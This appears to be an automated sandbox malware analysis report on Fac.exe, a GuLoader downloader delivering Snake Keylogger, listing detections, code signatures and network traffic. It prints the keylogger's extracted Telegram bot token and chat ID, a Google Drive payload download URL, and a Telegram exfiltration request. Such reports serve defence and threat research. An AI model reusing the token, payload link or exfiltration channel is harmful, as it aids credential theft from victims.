Edit tour

Windows Analysis Report
Fac.exe

Overview

General Information

Sample name:	Fac.exe
Analysis ID:	1557697
MD5:	54025d91662e8fa2169596cd35431cda
SHA1:	40e1c2fbc4ef47373dfd69a8853c18e5095d4cf1
SHA256:	82736a226e54e0314c4b4e9967ef45eddbfd6bdc4737bb7d0d6f23cf89bde33c
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

Fac.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\Fac.exe" MD5: 54025D91662E8FA2169596CD35431CDA)

Fac.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\Fac.exe" MD5: 54025D91662E8FA2169596CD35431CDA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7511877228:AAEfdtsXiYLhmN4YbL4GOCHPaqlvykB-alc", "Chat_id": "7534008929", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.42430985233.0000000006462000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Fac.exe PID: 6840	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Fac.exe PID: 6840	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T14:53:26.948320+0100	2803305	3	Unknown Traffic	192.168.11.20	49771	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T14:53:24.895412+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49769	193.122.6.168	80	TCP
2024-11-18T14:53:26.535622+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49769	193.122.6.168	80	TCP
2024-11-18T14:53:27.348298+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49772	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T14:53:20.138741+0100	2803270	2	Potentially Bad Traffic	192.168.11.20	49767	142.251.41.14	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: phishing
Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7511877228:AAEfdtsXiYLhmN4YbL4GOCHPaqlvykB-alc", "Chat_id": "7534008929", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Fac.exe

ReversingLabs: Detection: 23%

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3D2A8 CryptUnprotectData,		2_2_36C3D2A8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3D9F0 CryptUnprotectData,		2_2_36C3D9F0

Source: Fac.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49770 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.20:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.72.97:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49786 version: TLS 1.2

Source: Fac.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00402868 FindFirstFileW,	2_2_00402868
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_004065C7 FindFirstFileW,FindClose,	2_2_004065C7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405996

Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 0015F45Dh	2_2_0015F2C0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 0015F45Dh	2_2_0015F4AC
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 0015F45Dh	2_2_0015F52D
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 0015FC17h	2_2_0015F95F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36C331E0h	2_2_36C32DC8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36C3FB7Fh	2_2_36C3F8D8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36C32C19h	2_2_36C32968
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then mov esp, ebp	2_2_36C3F641
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36C331E0h	2_2_36C32DC3
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36C30D0Dh	2_2_36C30B30
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36C31697h	2_2_36C30B30
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_36C30040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36C331E0h	2_2_36C3310E
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBAA23h	2_2_36FBA6E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB556Fh	2_2_36FB52C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBB00Fh	2_2_36FBAD40
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB25A7h	2_2_36FB2300
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB189Fh	2_2_36FB15F8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB92A1h	2_2_36FB8FF8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBC2C6h	2_2_36FBBFF8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB0B97h	2_2_36FB08F0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB8597h	2_2_36FB82F0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB788Fh	2_2_36FB75E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBE2B6h	2_2_36FBDFE8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB9C87h	2_2_36FB99E0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBB9A6h	2_2_36FBB6D8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB6277h	2_2_36FB5FD0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBD996h	2_2_36FBD6C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB4867h	2_2_36FB45C0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB3B5Fh	2_2_36FB38B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBF986h	2_2_36FBF6B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB2E57h	2_2_36FB2BB0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB214Fh	2_2_36FB1EA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBD076h	2_2_36FBCDA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB1447h	2_2_36FB11A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB8E47h	2_2_36FB8BA0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB073Fh	2_2_36FB0498
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB813Fh	2_2_36FB7E98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBF066h	2_2_36FBED98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB7437h	2_2_36FB7190
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBA537h	2_2_36FBA290
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB982Fh	2_2_36FB9588
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBC756h	2_2_36FBC488
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB5E1Fh	2_2_36FB5B78
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBE746h	2_2_36FBE478
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB5117h	2_2_36FB4E70
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB440Fh	2_2_36FB4168
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBBE36h	2_2_36FBBB68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB3707h	2_2_36FB3460
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB29FFh	2_2_36FB2758
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBDE26h	2_2_36FBDB58
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB1CF7h	2_2_36FB1A50
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB0FEFh	2_2_36FB0D48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB89EFh	2_2_36FB8748
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBB516h	2_2_36FBB248
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBFE16h	2_2_36FBFB48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB02E7h	2_2_36FB0040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB7CE7h	2_2_36FB7A40
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBA0DFh	2_2_36FB9E38
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBD506h	2_2_36FBD238
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBF4F6h	2_2_36FBF228
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB59C7h	2_2_36FB5720
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB4CBFh	2_2_36FB4A18
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBCBE6h	2_2_36FBC918
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB3FB7h	2_2_36FB3D10
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FB32AFh	2_2_36FB3008
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FBEBD6h	2_2_36FBE908
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE64E0h	2_2_36FE61E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE3076h	2_2_36FE2DA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE22C6h	2_2_36FE1FF8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEBAF0h	2_2_36FEB7F8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE10BEh	2_2_36FE0DF0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE8FE8h	2_2_36FE8CF0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE42B6h	2_2_36FE3FE8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEFDE0h	2_2_36FEFAE8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FED2D8h	2_2_36FECFE0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEA7D0h	2_2_36FEA4D8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE079Eh	2_2_36FE04D0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE7CC8h	2_2_36FE79D0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE3996h	2_2_36FE36C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEEAC0h	2_2_36FEE7C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEBFB8h	2_2_36FEBCC0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE5986h	2_2_36FE56B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE94B0h	2_2_36FE91B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE69A8h	2_2_36FE66B0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FED7A0h	2_2_36FED4A8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEAC98h	2_2_36FEA9A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE5066h	2_2_36FE4D98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE8190h	2_2_36FE7E98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEEF88h	2_2_36FEEC90
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE2756h	2_2_36FE2488
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEC480h	2_2_36FEC188
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE154Eh	2_2_36FE1280
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE9978h	2_2_36FE9680
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE4747h	2_2_36FE4478
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE6E70h	2_2_36FE6B78
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEDC68h	2_2_36FED970
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE1E36h	2_2_36FE1B68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEB160h	2_2_36FEAE68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE0C2Eh	2_2_36FE0960
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE8658h	2_2_36FE8360
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE3E26h	2_2_36FE3B58
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEF450h	2_2_36FEF158
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEC948h	2_2_36FEC650
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE5EB7h	2_2_36FE5B48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE9E40h	2_2_36FE9B48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE030Eh	2_2_36FE0040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE7338h	2_2_36FE7040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE3506h	2_2_36FE3238
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEE130h	2_2_36FEDE38
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEB628h	2_2_36FEB330
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE54F6h	2_2_36FE5228
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE8B20h	2_2_36FE8828
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEF918h	2_2_36FEF620
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE2BE6h	2_2_36FE2918
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FECE10h	2_2_36FECB18
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE19B7h	2_2_36FE1710
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEA308h	2_2_36FEA010
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE4BD6h	2_2_36FE4908
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FE7800h	2_2_36FE7508
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 36FEE5F8h	2_2_36FEE300
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 37001B20h	2_2_37001828
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 37000800h	2_2_37000508
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 37001658h	2_2_37001360
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 37000CC8h	2_2_370009D0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 37000339h	2_2_37000040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then jmp 37001190h	2_2_37000E98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_37043E61
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_37043E70
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_37040A00
Source: C:\Users\user\Desktop\Fac.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_37040A10

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2018/11/2024%20/%2016:31:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49772 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49769 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49771 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49767 -> 142.251.41.14:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49770 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
